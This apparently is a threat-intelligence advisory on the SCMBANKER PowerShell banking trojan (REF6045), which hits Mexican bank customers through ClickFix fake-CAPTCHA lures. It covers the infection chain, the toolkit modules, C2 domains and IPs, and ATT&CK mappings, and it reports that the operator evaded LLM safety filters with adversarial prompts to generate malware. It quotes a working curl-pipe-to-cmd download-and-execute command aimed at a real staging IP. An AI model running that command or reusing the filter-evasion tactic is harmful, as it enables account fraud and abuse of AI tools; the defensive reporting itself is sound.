# SCMBANKER PowerShell Banking Trojan Targets Mexican Financial Sector via ClickFix Fake CAPTCHA Lures (REF6045)

> Elastic Security Labs tracked REF6045, an operator-assisted banking fraud campaign deploying the PowerShell-based SCMBANKER toolkit against Mexican banks, fintechs, payment processors, and crypto exchanges via ClickFix fake-CAPTCHA lures. The toolkit combines credential theft, clipboard hijacking (CLABE/card swapping), vishing overlays, screenshot exfiltration, and Remote Utilities RAT deployment, with strong evidence the code was AI-generated via an LLM prompted in Spanish.

- **Published:** 2026-07-10T00:00:00Z
- **Last reviewed:** 2026-07-10T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-1175
- **ID:** TL-2026-1175
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Actor:** REF6045 operator
- **Detections:** 9 · **IOCs:** 35 (full data via the Threadlinqs MCP server — Purple tier)

## Description

REF6045 is an active, operator-assisted banking fraud operation tracked by Elastic Security Labs (researchers Jia Yu Chan and Salim Bitam), first observed with toolkit components dating to at least October 2025 and publicly disclosed 2026-07-08. Victims are lured to fake CAPTCHA verification pages styled as "Google Verificación Segura" that instruct them to paste and execute a command in the Windows Run dialog — the ClickFix social-engineering technique. The initial command (`cmd /c curl -k http://68.211.161.46/validation.txt | cmd.exe`) downloads a batch script that drives a six-stage execution chain: (1) launching Microsoft Edge in kiosk mode against fakeupdate.net to distract the victim with a fake Windows Update screen; (2) repeatedly relaunching with -Verb RunAs every 20 seconds to fatigue the victim into granting UAC admin consent, displaying the Spanish-language message "Se requieren permisos de administrador para actualizar su sistema..."; (3) confining the mouse cursor to a 1x1 pixel region via the Win32 ClipCursor API to prevent victim interference during installation; (4) using bitsadmin to pull the full PowerShell toolkit from an open directory to C:\Users\Public\; (5) establishing persistence via run.vbs (an HKCU Run key, three startup-folder copies, and an infection-timestamp marker id.txt); and (6) forcing a reboot via shutdown /r /t 02 to trigger the newly installed persistence.

The resulting SCMBANKER toolkit is a modular PowerShell-based banking trojan launched by run.vbs and comprising: cliente.ps1 (C2 beacon posting machine profile every 30 seconds), jujuzkt.ps1/jujuzkt2.ps1 (banking-session window-title monitoring and clipboard-based phishing redirection), mensaje1.ps1/mensaje.ps1/mensajeoff.ps1 (vishing dispatcher plus hard-lock and soft-lock fake bank-warning overlay windows), rotor1.ps1/screen2.ps1 (screenshot capture, ~42 screenshots per banking trigger over 5 minutes), rotor2.ps1/rotor.ps1 (process-name mutation wrappers), key.ps1 (Base64-obfuscated Win32 API keylogger with an unused Telegram exfiltration path, falling back to HTTP POST), clip.ps1/clip2.ps1 (CLABE and card-number clipboard hijackers using prefix/BIN matching to swap in attacker account numbers), avs.ps1/instaler.ps1/remoto.ps1 (silent deployment of the commercial Remote Utilities Host RAT, including registry-based callback configuration and UninstallString removal to resist removal), edifhjwe.ps1 (self-update mechanism that wipes and redeploys the toolkit while preserving state files), and correr.ps1 (arbitrary operator-issued PowerShell execution). cursor2.exe, a compiled AutoIt binary, replaces the system cursor with an invisible cursor to further obscure operator/victim interaction.

C2 infrastructure centers on negratomasa2026.online (and alternate gestionmontelavaria2026.online, plus IP-based fallback 185.242.246.169), exposing distinct endpoints for beaconing, banking alerts, screenshot exfiltration, keylog exfiltration, and remote-configuration text files controlling bank keyword lists, phishing redirect targets, vishing victim-IP mappings, and attacker CLABE/card numbers for clipboard substitution. ClickFix landing pages were hosted at ratonvaquero2026.online, monteviral2026.duckdns.org, and osogransd.online, with toolkit file staging on 68.211.161.46 and 216.250.112.100.

Elastic researchers assess the toolkit's source code was substantially AI-generated: consistent banner-comment scaffolding ("INTERVALOS DE TIEMPO", "DICCIONARIOS Y VARIABLES", "FUNCIONES", "INICIO", "LOOP PRINCIPAL"), clean function names paired with hand-shortened variables, instruction-like comments directly above corresponding code consistent with Copilot/Cursor-style assistant output, and self-documenting Base64 obfuscation (e.g., a literal comment identifying `user32.dll` immediately beside its Base64-encoded string). Profanity-laden comments cluster specifically in the mutation rotator and keylogger modules, suggesting the operator used adversarial phrasing to bypass LLM safety filters for those more sensitive components, then applied light manual obfuscation with minimal review. Operator OPSEC failures — an open directory exposing the entire toolkit, a briefly-hosted full web-root archive (zkt.zip), and an unauthenticated targeting-configuration editor at /b/editor.php — allowed Elastic to fully reconstruct the operation, including a live victim counter visible on the operator's dashboard confirming active, ongoing victimization of Mexican financial-sector customers.

## MITRE ATT&CK

- T1566.002 Spearphishing Link
- T1204.001 Malicious Link
- T1059.003 Windows Command Shell
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1548.002 Bypass User Account Control
- T1036.005 Match Legitimate Resource Name or Location
- T1564.001 Hidden Files and Directories
- T1027 Obfuscated Files or Information
- T1140 Deobfuscate/Decode Files or Information
- T1685 Disable or Modify Tools
- T1070 Indicator Removal
- T1056.001 Keylogging
- T1082 System Information Discovery
- T1016 System Network Configuration Discovery
- T1010 Application Window Discovery
- T1113 Screen Capture
- T1115 Clipboard Data
- T1119 Automated Collection
- T1105 Ingress Tool Transfer
- T1197 BITS Jobs
- T1219 Remote Access Tools
- T1071.001 Web Protocols
- T1102 Web Service
- T1041 Exfiltration Over C2 Channel
- T1529 System Shutdown/Reboot
- T1657 Financial Theft
- T1583.001 Domains
- T1587.001 Malware

## Sources

- [REF6045: Mexican banking fraud toolkit with signs of AI-assisted development](https://www.elastic.co/security-labs/mexican-banking-fraud-scmbanker-ref6045)
- [SCMBANKER Malware Uses ClickFix Lures to Target Mexican Banking Users](https://thehackernews.com/2026/07/scmbanker-malware-uses-clickfix-lures.html)
- [REF6045 Uses SCMBANKER PowerShell Toolkit to Target Mexican Banking Customers](https://gbhackers.com/ref6045-uses-scmbanker-powershell/)
- [Elastic finds AI-assisted banking fraud ring in Mexico](https://securitybrief.com.au/story/elastic-finds-ai-assisted-banking-fraud-ring-in-mexico)
- [SCMBANKER Malware Turns ClickFix Pages Into Operator-Assisted Mexican Banking Fraud](https://cyberpress.org/clickfix-powers-mexican-fraud/)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-1175
